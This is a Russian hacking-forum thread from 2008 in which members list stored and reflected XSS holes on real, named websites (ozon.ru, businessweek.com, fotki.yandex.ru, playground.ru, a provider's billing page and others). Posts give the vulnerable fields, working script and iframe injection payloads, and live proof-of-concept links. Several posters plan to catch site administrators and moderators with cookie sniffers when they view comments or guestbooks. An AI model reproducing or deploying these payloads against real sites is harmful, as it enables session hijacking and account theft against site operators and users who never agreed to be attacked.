Хранимые XSS

Discussion in 'Уязвимости' started by +toxa+, 18 Mar 2007.

  1. fatalo

    fatalo Elder - Старейшина

    Joined:
    15 May 2008
    Messages:
    45
    Likes Received:
    46
    Reputations:
    5
    www.skisport.ru
    Оффициальный сайт журанала лыжный спорт.
    Пример скрипта:
    HTML:
    http://www.skisport.ru/search/index.php?search=%3Cscript%3Ealert%28%27fatalo+for+antichat.ru%27%29%3C%2Fscript%3E&days=&dts=&dte=
    У этого ресурса бажная функция поиска по сайту.
    Как обычно пишем:
    PHP:
    <script>alert('antichat.ru want you!')</script> 
    И творим добро =)
     
  2. MaSTeR GэN

    MaSTeR GэN Member

    Joined:
    23 May 2008
    Messages:
    102
    Likes Received:
    54
    Reputations:
    7
    А зря может кто нить научился бы xss различать ;)
    vkadre.ru
    собственно тыкая создать добавить ролик вбиваем имя
    Code:
    </title><script>alert(/xss/)</script>
    +
    cобственно канает любой тег главное title закрыть ;)

    вотс уже рабочий линк
    http://vkadre.ru/users/1926899

    Кто хорошо подумает может на самом контакте активку найти ;)
     
    #182 MaSTeR GэN, 10 Jun 2008
    Last edited: 10 Jun 2008
    4 people like this.
  3. MaSTeR GэN

    MaSTeR GэN Member

    Joined:
    23 May 2008
    Messages:
    102
    Likes Received:
    54
    Reputations:
    7
    вообшем то сайт ру подкастинга ;)
    rpod.ru

    собсвенно уязвимо поле коменнентов т,е заходим выбириаем группу тему и оставляем коммент
    Code:
    <iframe src="http://blabla.ru/index.html" < 
    ну и собственно создаем на домене blabla.ru index.html
    c нужным кодом )
    рабочий пример с фреймом на гугль.ru )
    http://siski-piski-show.rpod.ru/82.html#c110876
     
  4. Лайт

    Лайт Active Member

    Joined:
    23 May 2007
    Messages:
    63
    Likes Received:
    172
    Reputations:
    11
    Тока что нашел одну ХСС у себя на форуме на mybb.ru, наверно баян, но все же.
    В профиле есть вкладка "остальное", в админке можно разрешить пользователям заполнять ее.

    Пишем <script>alert()</script> и вуаля. А дальше ищите дурака админа, который разрешил эти поля.
    Проблема в длинне. Максимум на серве 999 символов, а там, кто как поставит.
     
    #184 Лайт, 13 Jun 2008
    Last edited: 13 Jun 2008
  5. Лайт

    Лайт Active Member

    Joined:
    23 May 2007
    Messages:
    63
    Likes Received:
    172
    Reputations:
    11
    Нашел уязвимость на www.playground.ru
    Жмем регистрация и вставляем <script>alert()</script>
    Уязвимые поля:
    Конфигурация компьютера
    Ваш сайт
    О себе

    Вот моя рега http://users.playground.ru/448520/
     
    #185 Лайт, 15 Jun 2008
    Last edited: 15 Jun 2008
    3 people like this.
  6. Ded MustD!e

    Ded MustD!e Banned

    Joined:
    23 Aug 2007
    Messages:
    392
    Likes Received:
    694
    Reputations:
    405
    Журнал Total Football

    http://www.totalfootball.ru

    Добавляем комментарий к новости, уязвимы все поля :p

    Также присутствует пассивка в поиске, и если поискать sql-inj ;)
     
    1 person likes this.
  7. Лайт

    Лайт Active Member

    Joined:
    23 May 2007
    Messages:
    63
    Likes Received:
    172
    Reputations:
    11
    Случайно нашел доску объявлений.
    Уязвимы все комменты к товарам.
    http://stolbik.kiev.ua/b5111492.html
    А в поиске сидит пассивка:
    _http://stolbik.kiev.ua/search_sp.php?text=%22%3E%3Cscript%3Ealert%28%27XSS+from+Light%27%29%3C%2Fscript%3E&group=0&search_butt.x=28&search_butt.y=9
     
    #187 Лайт, 15 Jun 2008
    Last edited: 15 Jun 2008
  8. Лайт

    Лайт Active Member

    Joined:
    23 May 2007
    Messages:
    63
    Likes Received:
    172
    Reputations:
    11
    Вот еще: http://www.inox.ua/?check=guest_book&lt=1213543321953
    Уязвимые поля: Имя, www, сообщение.
    Частенько админ заглядывает в гостевую и коментит, можно его поймать)))
    В поиске тоже сидит пассивка.

    __________
    Админ прикрыл посты без модерации, но XSS осталось, поэтому когда одмин будет просматривать, его можно накормить снифером...
     
    #188 Лайт, 15 Jun 2008
    Last edited: 16 Jun 2008
    1 person likes this.
  9. Лайт

    Лайт Active Member

    Joined:
    23 May 2007
    Messages:
    63
    Likes Received:
    172
    Reputations:
    11
    Вот какого зверя я нашел на этот раз: http://www.ilovedress.ru/catalogue/shops/?pid=168
    уязвимым оказалось имя пользователя
    ЗЫ Админка тоже на глаза попалась http://www.ilovedress.ru/admin/login.php

    Я только не особо воткнул, что выскакивает по этой ссылке http://www.ilovedress.ru/catalogue/shops/?pid=0

    ____________
    Админ прикрыл гостевую, наверно фильтр поставит(((
     
    #189 Лайт, 16 Jun 2008
    Last edited: 16 Jun 2008
  10. MaSTeR GэN

    MaSTeR GэN Member

    Joined:
    23 May 2008
    Messages:
    102
    Likes Received:
    54
    Reputations:
    7
    хочешь удивиться ? ))) выскакивает alert(document.cookie)
    ;) просто в куках кроме id cессии не чего нет )
     
    1 person likes this.
  11. Лайт

    Лайт Active Member

    Joined:
    23 May 2007
    Messages:
    63
    Likes Received:
    172
    Reputations:
    11
    Пасиба что растолковал, я примерно догадывался, но надо было по точнее узнать.

    А вот мой утренний XSS, так сказать за завтраком.
    http://www.iemag.ru/articles/detail.php?ID=6308?add-comment
     
  12. Лайт

    Лайт Active Member

    Joined:
    23 May 2007
    Messages:
    63
    Likes Received:
    172
    Reputations:
    11
    Вот моя вечерняя XSS, есть над чем поугарать, специально для самых внимательных.
    http://www.tabacum.ru/showinfo.php?id=63
    Поля: имя и коммент
     
    1 person likes this.
  13. MaSTeR GэN

    MaSTeR GэN Member

    Joined:
    23 May 2008
    Messages:
    102
    Likes Received:
    54
    Reputations:
    7
    businessweek.com
    полезно иногда новости читать ;)
    постим коммент к новости
    Code:
    <iframe src=http://ha.ckers.org/scriptlet.html <
    
    содержание scriptlet.html думаю сами понимаете ))
    Code:
    <SCRIPT LANGUAGE="JavaScript">alert('XSS')</SCRIPT>
    воврашаемся обратно по линку с новостью )) вуаля )
    для примера вот news ;)
    http://www.businessweek.com/technology/content/jun2008/tc20080616_034849.htm?chan=technology_technology+index+page_top+stories

    P.S вся эта радость работает из за отображения последнего коммента во время поста нового но на странице где отображаються все комменты все нормально фильтруеться )
     
    #193 MaSTeR GэN, 17 Jun 2008
    Last edited: 17 Jun 2008
    1 person likes this.
  14. freddi

    freddi Elder - Старейшина

    Joined:
    5 Jul 2006
    Messages:
    399
    Likes Received:
    243
    Reputations:
    145
    fotki.yandex.ru

    уязвимо поле "Альбом". ничего не фильтруется.
     
    4 people like this.
  15. Лайт

    Лайт Active Member

    Joined:
    23 May 2007
    Messages:
    63
    Likes Received:
    172
    Reputations:
    11
    #195 Лайт, 19 Jun 2008
    Last edited: 19 Jun 2008
  16. l1ght

    l1ght Elder - Старейшина

    Joined:
    5 Dec 2006
    Messages:
    191
    Likes Received:
    678
    Reputations:
    333
    комментарии на wiki.xakep.ru собственно пример:
    Code:
    http://wiki.xakep.ru/(S(binh5p451x3ngf45fdpipz55))/fononnyi_kompyuter.ashx?Discuss=1&NoRedirect=1
     
    6 people like this.
  17. desTiny

    desTiny Elder - Старейшина

    Joined:
    4 Feb 2007
    Messages:
    1,006
    Likes Received:
    444
    Reputations:
    94
    продолжим с гуглом...
    greetz to xcedz, закобяка ты ендакая..

    Заходим в группы и заливаем в файлы html-файл.
    Вот пример:
    http://here-is-xss.googlegroups.com/web/XSS.htm?gda=Z1hfxDgAAAA76U5U5sly8vjF2QR9OTG0MTrRWPVPWrWJTq_RUQGHwWG1qiJ7UbTIup-M2XPURDQUbzuizSHsttw_trxthalY

    Ъхек :)
     
    #197 desTiny, 29 Jun 2008
    Last edited: 29 Jun 2008
    2 people like this.
  18. Kusto

    Kusto Elder - Старейшина

    Joined:
    4 Feb 2007
    Messages:
    886
    Likes Received:
    678
    Reputations:
    510
    коментарии вот собственно пример
    http://www.new-most.info/press-centre/announcements/4508.htm#comment

    Блин- в алерте написал Россия-чемпион (сайт был украинский) теперь прежде чем вывесить комент комент пишет что типа ваш комент будет добавлен после проверки модератором)))- а мож это и неплохо совсем- так окажется гарантия если прийдут куки то что куки модера или админа)))
     
    #198 Kusto, 29 Jun 2008
    Last edited: 1 Jul 2008
  19. base

    base Member

    Joined:
    20 Jun 2008
    Messages:
    7
    Likes Received:
    6
    Reputations:
    -10
    ozon.ru
    В отзыве на товар, уязвимое поле Страна/город. Недостаток в том, что нужно ждать два/три дня пока отзыв отправится в паблик.
    Пример: http://www.ozon.ru/context/detail/id/3819533/

    Code:
    <td colspan="3" align="right" class="vertpadd" 
    style="padding-right:20px; color:Gray;">Мамедов&nbsp;
    (<a href=/context/client_opinion/ClientGuid/9596607c-384f-4f1e-a17f-ac49e92840c4/>все отзывы</a>), 
    Москва[B]<fuck>[/B], 21 год
            </td>
     
    #199 base, 30 Jun 2008
    Last edited: 30 Jun 2008
    2 people like this.
  20. BlackSun

    BlackSun Banned

    Joined:
    1 Apr 2007
    Messages:
    989
    Likes Received:
    1,168
    Reputations:
    446
    Пров Дом.сру, биллинг
    http://tmn.citydom.ru/bill/
    Активная ксс у операторов в статистике (в забаненных логинах, при большом кол-ве неправильных попыток), уязвимо поле Логин